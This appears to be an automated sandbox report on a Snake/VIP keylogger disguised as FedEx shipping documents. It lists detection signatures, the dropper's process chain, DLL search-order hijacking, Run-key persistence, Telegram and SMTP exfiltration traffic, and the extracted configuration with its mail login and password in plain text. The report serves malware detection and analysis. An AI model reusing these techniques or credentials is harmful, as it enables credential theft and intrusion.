12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.294202f6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
14.2.hzwdvhxM.pif.2cee0000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
Click to see the 240 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hzwdvhxM.pif, NewProcessName: C:\Users\Public\Libraries\hzwdvhxM.pif, OriginalFileName: C:\Users\Public\Libraries\hzwdvhxM.pif, ParentCommandLine: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe", ParentImage: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ParentProcessId: 7376, ParentProcessName: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessCommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, ProcessId: 7632, ProcessName: hzwdvhxM.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Mxhvdwzh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mxhvdwzh

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\hzwdvhxM.pif, Initiated: true, ProcessId: 7632, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Mxhvdwzh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mxhvdwzh

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hzwdvhxM.pif, NewProcessName: C:\Users\Public\Libraries\hzwdvhxM.pif, OriginalFileName: C:\Users\Public\Libraries\hzwdvhxM.pif, ParentCommandLine: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe", ParentImage: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ParentProcessId: 7376, ParentProcessName: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessCommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, ProcessId: 7632, ProcessName: hzwdvhxM.pif

Sigma detected: Potentially Suspicious Rundll32 Activity

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine|base64offset|contains: , Image: C:\Users\Public\ndpha.pif, NewProcessName: C:\Users\Public\ndpha.pif, OriginalFileName: C:\Users\Public\ndpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , ProcessId: 7724, ProcessName: ndpha.pif

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:12:04.867095+0100	2803305	3	Unknown Traffic	192.168.2.8	49708	104.21.32.1	443	TCP
2025-02-18T08:12:07.875038+0100	2803305	3	Unknown Traffic	192.168.2.8	49712	104.21.32.1	443	TCP
2025-02-18T08:12:14.222939+0100	2803305	3	Unknown Traffic	192.168.2.8	49723	104.21.32.1	443	TCP
2025-02-18T08:12:18.054248+0100	2803305	3	Unknown Traffic	192.168.2.8	49729	104.21.32.1	443	TCP
2025-02-18T08:12:20.129975+0100	2803305	3	Unknown Traffic	192.168.2.8	49731	104.21.32.1	443	TCP
2025-02-18T08:12:22.221609+0100	2803305	3	Unknown Traffic	192.168.2.8	49733	104.21.32.1	443	TCP
2025-02-18T08:12:28.510972+0100	2803305	3	Unknown Traffic	192.168.2.8	49741	104.21.32.1	443	TCP
2025-02-18T08:12:32.240492+0100	2803305	3	Unknown Traffic	192.168.2.8	49750	104.21.32.1	443	TCP
2025-02-18T08:12:34.577920+0100	2803305	3	Unknown Traffic	192.168.2.8	49755	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:12:02.721265+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	132.226.8.169	80	TCP
2025-02-18T08:12:04.326141+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	132.226.8.169	80	TCP
2025-02-18T08:12:06.029153+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	132.226.8.169	80	TCP
2025-02-18T08:12:07.295005+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	132.226.8.169	80	TCP
2025-02-18T08:12:16.021871+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49725	132.226.8.169	80	TCP
2025-02-18T08:12:17.521877+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49725	132.226.8.169	80	TCP
2025-02-18T08:12:19.521839+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49730	132.226.8.169	80	TCP
2025-02-18T08:12:26.389767+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49735	132.226.8.169	80	TCP
2025-02-18T08:12:27.952232+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49735	132.226.8.169	80	TCP
2025-02-18T08:12:29.499153+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49742	132.226.8.169	80	TCP
2025-02-18T08:12:30.921014+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49746	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:12:16.817919+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49727	149.154.167.220	443	TCP
2025-02-18T08:12:33.138593+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49752	149.154.167.220	443	TCP
2025-02-18T08:12:39.879753+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	49762	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	ReversingLabs: Detection: 64%
Source: C:\Users\Public\Libraries\Mxhvdwzh.PIF	Virustotal: Detection: 62%	Perma Link
Source: C:\Windows \SysWOW64\NETUTILS.dll	ReversingLabs: Detection: 36%
Source: C:\Windows \SysWOW64\NETUTILS.dll	Virustotal: Detection: 33%	Perma Link

Multi AV Scanner detection for submitted file

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	ReversingLabs: Detection: 64%
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Virustotal: Detection: 62%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor: phatbills@xma0.com
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor: london@1759
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor: mail.xma0.com
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor: phatbills2@xma0.com
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor: 587
Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D628C00 CryptUnprotectData,		7_2_2D628C00
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 7_2_2D629361 CryptUnprotectData,		7_2_2D629361

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Unpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49728 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49738 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49762 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb/ source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ab.Pdb.T`b.# source: hzwdvhxM.pif, 0000000E.00000003.1919890397.000000002E620000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
Source:	Binary string: _.pdb source: hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
Source:	Binary string: easinvoker.pdbGCTL source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000072A000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.0000000000759000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D5534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02D5534C

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43D09Ch	7_2_2D43CDF0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D433326h	7_2_2D432F08
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D432D5Ch	7_2_2D432AA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43FC0Ch	7_2_2D43F960
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43F7B4h	7_2_2D43F508
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_2D430040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_2D430856
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43EF04h	7_2_2D43EC58
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43EAACh	7_2_2D43E800
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43F35Ch	7_2_2D43F0B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43E1FCh	7_2_2D43DF50
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D430D10h	7_2_2D430B30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D4316FBh	7_2_2D430B30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43E654h	7_2_2D43E3A8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43D4F4h	7_2_2D43D248
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D433326h	7_2_2D433254
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_2D430676
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43DDA4h	7_2_2D43DAF8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D43D94Ch	7_2_2D43D6A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6296F3h	7_2_2D629420
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62673Ch	7_2_2D626490
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D628320h	7_2_2D627FE0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D620FF4h	7_2_2D620D48
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62E3F1h	7_2_2D62E120
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then mov esp, ebp	7_2_2D62B52A
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6218A4h	7_2_2D6215F8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62144Ch	7_2_2D6211A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62E889h	7_2_2D62E5B8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62C861h	7_2_2D62C590
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62370Ch	7_2_2D623460
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62BF31h	7_2_2D62BC60
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6202ECh	7_2_2D620040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6262E4h	7_2_2D626038
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6232B4h	7_2_2D623008
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62FAE9h	7_2_2D62F818
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D626B96h	7_2_2D6268E8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D620B9Ch	7_2_2D6208F0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62C3C9h	7_2_2D62C0F8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D623B64h	7_2_2D6238B8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62DF59h	7_2_2D62DC88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D620744h	7_2_2D620498
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62D629h	7_2_2D62D358
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D622A04h	7_2_2D622758
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6255DCh	7_2_2D625330
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6279DCh	7_2_2D627730
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6225ACh	7_2_2D622300
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D625E8Ch	7_2_2D625BE0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62DAC1h	7_2_2D62D7F0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62BA99h	7_2_2D62B7C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D622E5Ch	7_2_2D622BB0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62F651h	7_2_2D62F380
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D625A34h	7_2_2D625788
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D627E34h	7_2_2D627B88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62ED21h	7_2_2D62EA50
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D621CFCh	7_2_2D621A50
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62CCF9h	7_2_2D62CA28
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62F1B9h	7_2_2D62EEE8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62D191h	7_2_2D62CEC0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D625184h	7_2_2D624ED8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D627584h	7_2_2D6272D8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D622154h	7_2_2D621EA8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D62712Ch	7_2_2D626E80
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D624D2Ch	7_2_2D624A80
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D696882h	7_2_2D696510
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D696EB3h	7_2_2D696BB8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D690311h	7_2_2D690040
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69D31Bh	7_2_2D69D020
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69B66Bh	7_2_2D69B370
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D690C41h	7_2_2D690970
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D695A19h	7_2_2D695748
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D697843h	7_2_2D697548
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69E63Bh	7_2_2D69E340
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D692C29h	7_2_2D692958
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69CE53h	7_2_2D69CB58
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6939F1h	7_2_2D693720
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D691A09h	7_2_2D691738
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69902Bh	7_2_2D698D30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69BFFBh	7_2_2D69BD00
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69A813h	7_2_2D69A518
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D695EB1h	7_2_2D695BE0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69ACDBh	7_2_2D69A9E0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6994F3h	7_2_2D6991F8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D6930C1h	7_2_2D692DF0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69C4C3h	7_2_2D69C1C8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D691EA1h	7_2_2D691BD0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69869Bh	7_2_2D6983A0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D693E89h	7_2_2D693BB8
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69DCABh	7_2_2D69D9B0
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D699E83h	7_2_2D699B88
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D694C51h	7_2_2D694980
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69F493h	7_2_2D69F198
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D692312h	7_2_2D692068
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D698B63h	7_2_2D698868
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69F95Bh	7_2_2D69F660
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D696349h	7_2_2D696078
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69E173h	7_2_2D69DE78
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D694321h	7_2_2D694050
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Code function: 4x nop then jmp 2D69A34Bh	7_2_2D69A050
